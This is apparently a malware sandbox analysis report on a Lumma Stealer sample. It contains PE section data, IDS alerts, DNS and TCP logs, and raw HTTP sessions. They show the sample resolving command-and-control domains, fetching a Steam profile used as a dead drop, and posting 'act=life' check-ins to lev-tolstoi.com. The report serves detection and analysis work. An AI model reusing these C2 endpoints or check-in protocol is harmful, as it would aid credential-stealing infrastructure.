buspngqz | 0x2f2000 | 0x19a000 | 0x199200 | d72b5c3f894e75cbe4e6c9269d24e536 | False | 0.9949199654369081 | data | 7.953319540828306 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
rkbtqtfk | 0x48c000 | 0x1000 | 0x400 | a881862b0b90a1b667915d9d91b7314c | False | 0.83203125 | data | 6.3751466816085145 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x48d000 | 0x3000 | 0x2200 | 10c7fc67d48e24d0c773dd869d5aaaf3 | False | 0.08823529411764706 | DOS executable (COM) | 1.165461070240526 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x53058 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-26T13:14:12.257087+0100 | 2058514 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) | 1 | 192.168.2.5 | 49590 | 1.1.1.1 | 53 | UDP
2024-12-26T13:14:12.397561+0100 | 2058502 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) | 1 | 192.168.2.5 | 59938 | 1.1.1.1 | 53 | UDP
2024-12-26T13:14:12.539037+0100 | 2058492 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) | 1 | 192.168.2.5 | 49793 | 1.1.1.1 | 53 | UDP
2024-12-26T13:14:12.679082+0100 | 2058500 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) | 1 | 192.168.2.5 | 56261 | 1.1.1.1 | 53 | UDP
2024-12-26T13:14:12.820808+0100 | 2058510 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) | 1 | 192.168.2.5 | 56981 | 1.1.1.1 | 53 | UDP
2024-12-26T13:14:12.962681+0100 | 2058484 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) | 1 | 192.168.2.5 | 61984 | 1.1.1.1 | 53 | UDP
2024-12-26T13:14:13.124075+0100 | 2058512 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) | 1 | 192.168.2.5 | 58993 | 1.1.1.1 | 53 | UDP
2024-12-26T13:14:13.293004+0100 | 2058480 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) | 1 | 192.168.2.5 | 63361 | 1.1.1.1 | 53 | UDP
2024-12-26T13:14:15.113927+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49704 | 104.102.49.254 | 443 | TCP
2024-12-26T13:14:15.913923+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.5 | 49704 | 104.102.49.254 | 443 | TCP
2024-12-26T13:14:17.635550+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | TCP
2024-12-26T13:14:18.418371+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | TCP
2024-12-26T13:14:18.418371+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | TCP
2024-12-26T13:14:19.766992+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49706 | 104.21.66.86 | 443 | TCP
2024-12-26T13:14:20.561905+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49706 | 104.21.66.86 | 443 | TCP
2024-12-26T13:14:20.561905+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49706 | 104.21.66.86 | 443 | TCP
2024-12-26T13:14:22.341952+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49707 | 104.21.66.86 | 443 | TCP
2024-12-26T13:14:24.656109+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49708 | 104.21.66.86 | 443 | TCP
2024-12-26T13:14:25.521287+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49708 | 104.21.66.86 | 443 | TCP
2024-12-26T13:14:27.144452+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49709 | 104.21.66.86 | 443 | TCP
2024-12-26T13:14:29.988082+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49712 | 172.67.157.254 | 443 | TCP
2024-12-26T13:14:30.758464+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49712 | 172.67.157.254 | 443 | TCP
2024-12-26T13:14:32.833657+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49715 | 172.67.157.254 | 443 | TCP
2024-12-26T13:14:36.082596+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49728 | 172.67.157.254 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 26, 2024 13:14:13.633320093 CET | 49704 | 443 | 192.168.2.5 | 104.102.49.254
Dec 26, 2024 13:14:13.633426905 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.5
Dec 26, 2024 13:14:13.633527994 CET | 49704 | 443 | 192.168.2.5 | 104.102.49.254
Dec 26, 2024 13:14:13.636609077 CET | 49704 | 443 | 192.168.2.5 | 104.102.49.254
Dec 26, 2024 13:14:13.636645079 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.5
Dec 26, 2024 13:14:15.113781929 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.5
Dec 26, 2024 13:14:15.113926888 CET | 49704 | 443 | 192.168.2.5 | 104.102.49.254
Dec 26, 2024 13:14:15.119019032 CET | 49704 | 443 | 192.168.2.5 | 104.102.49.254
Dec 26, 2024 13:14:15.119051933 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.5
Dec 26, 2024 13:14:15.119353056 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.5
Dec 26, 2024 13:14:15.159810066 CET | 49704 | 443 | 192.168.2.5 | 104.102.49.254
Dec 26, 2024 13:14:15.172383070 CET | 49704 | 443 | 192.168.2.5 | 104.102.49.254
Dec 26, 2024 13:14:15.215349913 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.5
Dec 26, 2024 13:14:15.913963079 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.5
Dec 26, 2024 13:14:15.913986921 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.5
Dec 26, 2024 13:14:15.914026022 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.5
Dec 26, 2024 13:14:15.914040089 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.5
Dec 26, 2024 13:14:15.914067984 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.5
Dec 26, 2024 13:14:15.914068937 CET | 49704 | 443 | 192.168.2.5 | 104.102.49.254
Dec 26, 2024 13:14:15.914140940 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.5
Dec 26, 2024 13:14:15.914186001 CET | 49704 | 443 | 192.168.2.5 | 104.102.49.254
Dec 26, 2024 13:14:15.914186001 CET | 49704 | 443 | 192.168.2.5 | 104.102.49.254
Dec 26, 2024 13:14:15.914216042 CET | 49704 | 443 | 192.168.2.5 | 104.102.49.254
Dec 26, 2024 13:14:16.137034893 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.5
Dec 26, 2024 13:14:16.137048960 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.5
Dec 26, 2024 13:14:16.137098074 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.5
Dec 26, 2024 13:14:16.137197018 CET | 49704 | 443 | 192.168.2.5 | 104.102.49.254
Dec 26, 2024 13:14:16.137264013 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.5
Dec 26, 2024 13:14:16.137299061 CET | 49704 | 443 | 192.168.2.5 | 104.102.49.254
Dec 26, 2024 13:14:16.137337923 CET | 49704 | 443 | 192.168.2.5 | 104.102.49.254
Dec 26, 2024 13:14:16.142940998 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.5
Dec 26, 2024 13:14:16.143021107 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.5
Dec 26, 2024 13:14:16.143049002 CET | 49704 | 443 | 192.168.2.5 | 104.102.49.254
Dec 26, 2024 13:14:16.143095016 CET | 49704 | 443 | 192.168.2.5 | 104.102.49.254
Dec 26, 2024 13:14:16.181047916 CET | 49704 | 443 | 192.168.2.5 | 104.102.49.254
Dec 26, 2024 13:14:16.181102037 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.5
Dec 26, 2024 13:14:16.181119919 CET | 49704 | 443 | 192.168.2.5 | 104.102.49.254
Dec 26, 2024 13:14:16.181128025 CET | 443 | 49704 | 104.102.49.254 | 192.168.2.5
Dec 26, 2024 13:14:16.326878071 CET | 49705 | 443 | 192.168.2.5 | 104.21.66.86
Dec 26, 2024 13:14:16.326948881 CET | 443 | 49705 | 104.21.66.86 | 192.168.2.5
Dec 26, 2024 13:14:16.327066898 CET | 49705 | 443 | 192.168.2.5 | 104.21.66.86
Dec 26, 2024 13:14:16.328233004 CET | 49705 | 443 | 192.168.2.5 | 104.21.66.86
Dec 26, 2024 13:14:16.328249931 CET | 443 | 49705 | 104.21.66.86 | 192.168.2.5
Dec 26, 2024 13:14:17.635299921 CET | 443 | 49705 | 104.21.66.86 | 192.168.2.5
Dec 26, 2024 13:14:17.635550022 CET | 49705 | 443 | 192.168.2.5 | 104.21.66.86
Dec 26, 2024 13:14:17.638588905 CET | 49705 | 443 | 192.168.2.5 | 104.21.66.86
Dec 26, 2024 13:14:17.638621092 CET | 443 | 49705 | 104.21.66.86 | 192.168.2.5
Dec 26, 2024 13:14:17.638830900 CET | 443 | 49705 | 104.21.66.86 | 192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:17.640213966 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:17.640249014 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:17.640284061 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:18.418374062 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:18.418473959 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:18.418636084 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:18.429383039 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:18.429419994 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:18.429439068 CET49705443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:18.429446936 CET44349705104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:18.461863041 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:18.461926937 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:18.462022066 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:18.462331057 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:18.462346077 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:19.766815901 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:19.766992092 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:19.768480062 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:19.768490076 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:19.768692017 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:19.770092964 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:19.770118952 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:19.770153046 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.561943054 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.562089920 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.562143087 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.562170982 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.562263012 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.562314034 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.562319040 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.562485933 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.562525034 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.562530041 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.569782019 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.569848061 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.569854975 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.584218025 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.584281921 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.584291935 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.628513098 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.681416035 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.722246885 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.722280025 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.769115925 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.771857977 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.775609016 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.775629044 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.775698900 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.775702000 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.775748968 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.775944948 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.775960922 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.775975943 CET49706443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.775981903 CET44349706104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.990916014 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.990973949 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.991035938 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.991389036 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:20.991400003 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:22.341840029 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:22.341952085 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:22.343451977 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:22.343483925 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:22.343755007 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:22.345305920 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:22.345508099 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:22.345552921 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:23.228852987 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:23.228956938 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:23.229077101 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:23.229366064 CET49707443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:23.229386091 CET44349707104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:23.349504948 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:23.349556923 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:23.349652052 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:23.349992037 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:23.350006104 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:24.656027079 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:24.656109095 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:24.658361912 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:24.658381939 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:24.658678055 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:24.660005093 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:24.660161972 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:24.660200119 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:24.660260916 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:24.707350016 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:25.521295071 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:25.521379948 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:25.521452904 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:25.521725893 CET49708443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:25.521744013 CET44349708104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:25.839617968 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:25.839673042 CET44349709104.21.66.86192.168.2.5
                                                                                                                                                                                                                                Dec 26, 2024 13:14:25.839745045 CET49709443192.168.2.5104.21.66.86
                                                                                                                                                                                                                                Dec 26, 2024 13:14:25.840440989 CET49709443192.168.2.5104.21.66.86
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 26, 2024 13:14:12.251796007 CET | 1.1.1.1 | 192.168.2.5 | 0x82f3 | Name error (3) | observerfry.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:14:12.394157887 CET | 1.1.1.1 | 192.168.2.5 | 0x8ad4 | Name error (3) | wordyfindy.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:14:12.535290003 CET | 1.1.1.1 | 192.168.2.5 | 0x2724 | Name error (3) | slipperyloo.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:14:12.677242994 CET | 1.1.1.1 | 192.168.2.5 | 0x5a89 | Name error (3) | manyrestro.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:14:12.818259954 CET | 1.1.1.1 | 192.168.2.5 | 0xdc8f | Name error (3) | shapestickyr.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:14:12.959492922 CET | 1.1.1.1 | 192.168.2.5 | 0x1a7b | Name error (3) | talkynicer.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:14:13.102869034 CET | 1.1.1.1 | 192.168.2.5 | 0x22ad | Name error (3) | curverpluch.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:14:13.261384964 CET | 1.1.1.1 | 192.168.2.5 | 0xe8bd | Name error (3) | tentabatte.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:14:13.430372000 CET | 1.1.1.1 | 192.168.2.5 | 0x5908 | Name error (3) | bashfulacid.lat | none | none | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:14:13.626596928 CET | 1.1.1.1 | 192.168.2.5 | 0x9cfa | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:14:16.322398901 CET | 1.1.1.1 | 192.168.2.5 | 0x467 | No error (0) | lev-tolstoi.com | | 104.21.66.86 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:14:16.322398901 CET | 1.1.1.1 | 192.168.2.5 | 0x467 | No error (0) | lev-tolstoi.com | | 172.67.157.254 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:14:28.675729990 CET | 1.1.1.1 | 192.168.2.5 | 0x931a | No error (0) | lev-tolstoi.com | | 172.67.157.254 | A (IP address) | IN (0x0001) | false
Dec 26, 2024 13:14:28.675729990 CET | 1.1.1.1 | 192.168.2.5 | 0x931a | No error (0) | lev-tolstoi.com | | 104.21.66.86 | A (IP address) | IN (0x0001) | false
• steamcommunity.com
• lev-tolstoi.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 104.102.49.254 | 443 | 5608 | C:\Users\user\Desktop\MaZjv5XeQi.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 12:14:15 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2024-12-26 12:14:15 UTC | 1905 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Thu, 26 Dec 2024 12:14:15 GMT
Content-Length: 35121
Connection: close
Set-Cookie: sessionid=0d7841a6cf55f0a4ff486125; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-26 12:14:15 UTC | 14479 | IN | Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-26 12:14:16 UTC | 16384 | IN | Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
2024-12-26 12:14:16 UTC | 3768 | IN | Data Ascii: </div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_persona_name"
2024-12-26 12:14:16 UTC | 490 | IN | Data Ascii: r Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div class="bt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 104.21.66.86 | 443 | 5608 | C:\Users\user\Desktop\MaZjv5XeQi.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-26 12:14:17 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: lev-tolstoi.com
2024-12-26 12:14:17 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-26 12:14:18 UTC | 1131 | IN | HTTP/1.1 200 OK
Date: Thu, 26 Dec 2024 12:14:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=ua8pk86gfm4doq5ln13cgf1gqk; expires=Mon, 21 Apr 2025 06:00:57 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v8tuaWDjHmGVFgi2RPrDd%2FALpPKgSgF5%2FQJEZB%2BLh7%2Byz6i2qZrHGPUlxewpPHo%2FG%2F3qBCbguyr2x1rbKFs9eNaQ2fNaSW1hVzTeonjoguExcn%2BRqWtmMvSu4n5ZAEw998Q%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f80fd61f98743a4-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1581&min_rtt=1573&rtt_var=606&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=906&delivery_rate=1781574&cwnd=232&unsent_bytes=0&cid=0eb1e422dad26a13&ts=793&x=0"
2024-12-26 12:14:18 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-26 12:14:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                2192.168.2.549706104.21.66.864435608C:\Users\user\Desktop\MaZjv5XeQi.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
2024-12-26 12:14:19 UTC  263 bytes  OUT  POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 47
Host: lev-tolstoi.com
